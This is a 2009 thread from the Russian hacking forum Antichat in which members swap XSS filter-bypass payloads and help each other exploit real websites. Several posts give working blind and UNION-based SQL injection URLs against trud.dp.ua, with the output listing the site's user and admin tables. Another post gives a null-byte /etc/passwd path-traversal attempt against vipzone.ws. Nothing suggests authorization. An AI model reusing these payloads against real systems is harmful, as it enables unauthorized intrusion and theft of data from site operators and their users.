ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.02.2009, 05:19
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
пиши так:
<ionmousemove=alert()>OVER
оно само разделит)
А теперь мой вопрос.
Ошибка типа:
[08-Feb-2009 18:12:09] ХХХ User Error : Application Assert Failure. [assert_failure] Unknown page type (hackas) encountered. in c:\Inetpub\wwwroot\site\info.php on line 47
in c:\Inetpub\wwwroot\site\info.php at line 47
запрос был вида:
вобщем нульбайт фильтруется |
|
|
09.02.2009, 05:25
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Или кста те ещё так подойдёт:
<bstyle="background:url(javascript:alert()); ">хек
разделится как:
<b style="background:url(javascript:alert()); ">хек
или атк:
<bstyle=background:url(javascript:alert())>xek
|
|
|
|
09.02.2009, 15:49
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
скажите пожалуйста,это скуль? если да,то как вывести инфу?
Код:
http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1
паук написал что это реальный путь к серверу
Последний раз редактировалось TELO; 09.02.2009 в 15:59..
|
|
|
|
09.02.2009, 16:11
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://trud.dp.ua/vacancyview.php?pagenumber=10&branch=-1'&area=
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/trudv2eq/trud-v2.dp.ua/vacancyview.php on line 24
вот.....
|
|
|
|
09.02.2009, 20:46
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Сообщение от TELO
скажите пожалуйста,это скуль? если да,то как вывести инфу?
Код:
http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1
паук написал что это реальный путь к серверу там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+substrin g(version(),1,1)=5&area=1
вот - там пять таблиц с именем %user%
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+ascii(su bstring((SELECT+table_name+from+information_schema .tables+where+table_name+like+char(37,117,115,101, 114,37)+limit+5,1),1,1))=117&area=1
Последний раз редактировалось pinky07; 09.02.2009 в 21:05..
|
|
|
|
09.02.2009, 21:00
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от pinky07
там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema
Если не уверен, зачем вводить людей в заблуждение?
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*
Сообщение от pinky07
вот - там пять таблиц с именем %user%
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+ascii(su bstring((SELECT+table_name+fr om+information_schema.tables+where+table_name+like +char(37,117,115,101,114,37)+limit+5,1),1,1))=117& area=1
Завязывай писать ахинею.
Если уж используешь подзапросы, то подумай, что ты вывел таким образом.
Таблиц с именем %user% там 15, если уж быть точным
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table _schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18+from+information_schema.tables+where+ta ble_name+LIKE+char(37,117,115,101,114,37)/*
information_schema:USER_PRIVILEGES
cacti:user_auth
cacti:user_auth_perms
cacti:user_auth_realm
cacti:user_log,mysql:user
printmedia:adm_users
trainings:adm_users
trainings:cron_user
trn:adm_users
trn:cron_user
truddp:adm_users
work-xeon:admin_user
work-xeon:cron_user
work-xeon:trud_reason_for_blocking_user
work-xeon:trud_user
Последний раз редактировалось jokester; 09.02.2009 в 21:21..
|
|
|
|
09.02.2009, 23:41
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 2
Провел на форуме:
7211
Репутация:
0
|
|
http://vipzone.ws//engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00
а что дальше???
|
|
|
|
09.02.2009, 23:55
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от coolz
а что дальше???
Дальше ничего, ты там видешь содержимое passwd? Нет там этой уязвимости.
Последний раз редактировалось AkyHa_MaTaTa; 09.02.2009 в 23:57..
|
|
|
|
09.02.2009, 23:58
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 2
Провел на форуме:
7211
Репутация:
0
|
|
Сообщение от AkyHa_MaTaTa
Дальше ничего, ты там видешь содержимое passwd? Нет там этой уязвимости.
Может поможет кто??
|
|
|
|
10.02.2009, 00:23
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от jokester
Если не уверен, зачем вводить людей в заблуждение?
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*
Завязывай писать ахинею.
Если уж используешь подзапросы, то подумай, что ты вывел таким образом.
Таблиц с именем %user% там 15, если уж быть точным
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table _schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18+from+information_schema.tables+where+ta ble_name+LIKE+char(37,117,115,101,114,37)/*
information_schema:USER_PRIVILEGES
cacti:user_auth
cacti:user_auth_perms
cacti:user_auth_realm
cacti:user_log,mysql:user
printmedia:adm_users
trainings:adm_users
trainings:cron_user
trn:adm_users
trn:cron_user
truddp:adm_users
work-xeon:admin_user
work-xeon:cron_user
work-xeon:trud_reason_for_blocking_user
work-xeon:trud_user
скажите пожалуйста,почему вывода нет?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
